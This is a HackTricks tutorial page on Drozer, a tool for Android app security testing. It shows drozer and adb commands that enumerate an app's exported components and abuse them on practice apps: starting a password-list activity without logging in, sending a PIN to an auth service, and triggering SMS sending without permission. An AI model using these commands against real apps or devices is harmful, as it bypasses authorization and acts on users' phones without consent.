# Drozer Tutorial
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} ## APKs to test * [Sieve](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) (from mrwlabs) * [DIVA](https://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz) **Parts of this tutorial were extracted from the [Drozer documentation pdf](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf).** ## Installation Install Drozer Client inside your host. Download it from the [latest releases](https://github.com/mwrlabs/drozer/releases). ```bash pip install drozer-2.4.4-py2-none-any.whl pip install twisted pip install service_identity ``` Download and install drozer APK from the [latest releases](https://github.com/mwrlabs/drozer/releases). At this moment it is [this](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk). ```bash adb install drozer.apk ``` ### Starting the Server Agent is running on port 31415, we need to [port forward](https://en.wikipedia.org/wiki/Port\_forwarding) to establish the communication between the Drozer Client and Agent, here is the command to do so: ```bash adb forward tcp:31415 tcp:31415 ``` Finally, **launch** the **application** and press the bottom "**ON**" ![](<../../../.gitbook/assets/image (63).png>) And connect to it: ```bash drozer console connect ``` ## Interesting Commands | **Commands** | **Description** | | --------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------ | | **Help MODULE** | Shows help of the selected module | | **list** | Shows a list of all drozer modules that can be executed in the current session. This hides modules that you don’t have appropriate permissions to run. | | **shell** | Start an interactive Linux shell on the device, in the context of the Agent. | | **clean** | Remove temporary files stored by drozer on the Android device. | | **load** | Load a file containing drozer commands and execute them in sequence. | | **module** | Find and install additional drozer modules from the Internet. | | **unset** | Remove a named variable that drozer passes to any Linux shells that it spawns. | | **set** | Stores a value in a variable that will be passed as an environmental variable to any Linux shells spawned by drozer. | | **shell** | Start an interactive Linux shell on the device, in the context of the Agent | | **run MODULE** | Execute a drozer module | | **exploit** | Drozer can create exploits to execute in the decide. `drozer exploit list` | | **payload** | The exploits need a payload. `drozer payload list` | ### Package Find the **name** of the package filtering by part of the name: ```bash dz> run app.package.list -f sieve com.mwr.example.sieve ``` **Basic Information** of the package: ```bash dz> run app.package.info -a com.mwr.example.sieve Package: com.mwr.example.sieve Process Name: com.mwr.example.sieve Version: 1.0 Data Directory: /data/data/com.mwr.example.sieve APK Path: /data/app/com.mwr.example.sieve-2.apk UID: 10056 GID: [1028, 1015, 3003] Shared Libraries: null Shared User ID: null Uses Permissions: - android.permission.READ_EXTERNAL_STORAGE - android.permission.WRITE_EXTERNAL_STORAGE - android.permission.INTERNET Defines Permissions: - com.mwr.example.sieve.READ_KEYS - com.mwr.example.sieve.WRITE_KEYS ``` Read **Manifest**: ```bash run app.package.manifest jakhar.aseem.diva ``` **Attack surface** of the package: ```bash dz> run app.package.attacksurface com.mwr.example.sieve Attack Surface: 3 activities exported 0 broadcast receivers exported 2 content providers exported 2 services exported is debuggable ``` * **Activities**: Maybe you can start an activity and bypass some kind of authorization that should be prevent you from launching it. * **Content providers**: Maybe you can access private data or exploit some vulnerability (SQL Injection or Path Traversal). * **Services**: * **is debuggable**: [Learn more](./#is-debuggeable) ### Activities An exported activity component’s “android:exported” value is set to **“true”** in the AndroidManifest.xml file: ```markup ``` **List exported activities**: ```bash dz> run app.activity.info -a com.mwr.example.sieve Package: com.mwr.example.sieve com.mwr.example.sieve.FileSelectActivity com.mwr.example.sieve.MainLoginActivity com.mwr.example.sieve.PWList ``` **Start activity**: Maybe you can start an activity and bypass some kind of authorization that should be prevent you from launching it. {% code overflow="wrap" %} ```bash dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList ``` {% endcode %} You can also start an exported activity from **adb**: * PackageName is com.example.demo * Exported ActivityName is com.example.test.MainActivity ```bash adb shell am start -n com.example.demo/com.example.test.MainActivity ``` ### Content Providers This post was so big to be here so **you can** [**access it in its own page here**](exploiting-content-providers.md). ### Services A exported service is declared inside the Manifest.xml: {% code overflow="wrap" %} ```markup ``` {% endcode %} Inside the code **check** for the \*\*`handleMessage`\*\*function which will **receive** the **message**: ![](<../../../.gitbook/assets/image (194).png>) #### List service ```bash dz> run app.service.info -a com.mwr.example.sieve Package: com.mwr.example.sieve com.mwr.example.sieve.AuthService Permission: null com.mwr.example.sieve.CryptoService Permission: null ``` #### **Interact** with a service ```bash app.service.send Send a Message to a service, and display the reply app.service.start Start Service app.service.stop Stop Service ``` #### Example Take a look to the **drozer** help for `app.service.send`: ![](<../../../.gitbook/assets/image (196) (1).png>) Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where.\ Using the `--extra` option you can send something interpreted by "_msg.replyTo"_, and using `--bundle-as-obj` you create and object with the provided details. In the following example: * `what == 2354` * `arg1 == 9234` * `arg2 == 1` * `replyTo == object(string com.mwr.example.sieve.PIN 1337)` ```bash run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 1 --extra string com.mwr.example.sieve.PIN 1337 --bundle-as-obj ``` ![](<../../../.gitbook/assets/image (195).png>) ### Broadcast Receivers **In the Android basic info section you can see what is a Broadcast Receiver**. After discovering this Broadcast Receivers you should **check the code** of them. Pay special attention to the **`onReceive`** function as it will be handling the messages received. #### **Detect all** broadcast receivers ```bash run app.broadcast.info #Detects all ``` #### Check broadcast receivers of an app ```bash #Check one negative run app.broadcast.info -a jakhar.aseem.diva Package: jakhar.aseem.diva No matching receivers. # Check one positive run app.broadcast.info -a com.google.android.youtube Package: com.google.android.youtube com.google.android.libraries.youtube.player.PlayerUiModule$LegacyMediaButtonIntentReceiver Permission: null com.google.android.apps.youtube.app.common.notification.GcmBroadcastReceiver Permission: com.google.android.c2dm.permission.SEND com.google.android.apps.youtube.app.PackageReplacedReceiver Permission: null com.google.android.libraries.youtube.account.AccountsChangedReceiver Permission: null com.google.android.apps.youtube.app.application.system.LocaleUpdatedReceiver Permission: null ``` #### Broadcast **Interactions** ```bash app.broadcast.info Get information about broadcast receivers app.broadcast.send Send broadcast using an intent app.broadcast.sniff Register a broadcast receiver that can sniff particular intents ``` #### Send a message In this example abusing the [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) Content Provider you can **send an arbitrary SMS** any non-premium destination **without asking** the user for permission. ![](<../../../.gitbook/assets/image (199).png>) ![](<../../../.gitbook/assets/image (197) (1).png>) If you read the code, the parameters "_phoneNumber_" and "_message_" must be sent to the Content Provider. ```bash run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers SendSMSNowReceiver --extra string phoneNumber 123456789 --extra string message "Hello mate!" ``` ### Is debuggeable A prodduction APK should never be debuggeable.\ This mean that you can **attach java debugger** to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them.[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) on digging deeper when you application is debuggable and injecting runtime code. When an application is debuggable, it will appear in the Manifest: ```xml **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %}
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.